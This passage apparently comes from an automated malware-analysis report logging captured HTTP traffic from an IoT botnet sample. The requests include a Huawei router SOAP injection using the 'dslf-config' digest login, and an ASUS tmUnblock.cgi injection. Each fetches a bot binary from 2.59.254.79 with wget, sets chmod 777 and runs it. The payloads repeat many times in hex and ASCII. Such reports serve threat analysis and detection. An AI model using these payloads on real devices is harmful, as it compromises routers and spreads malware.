50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
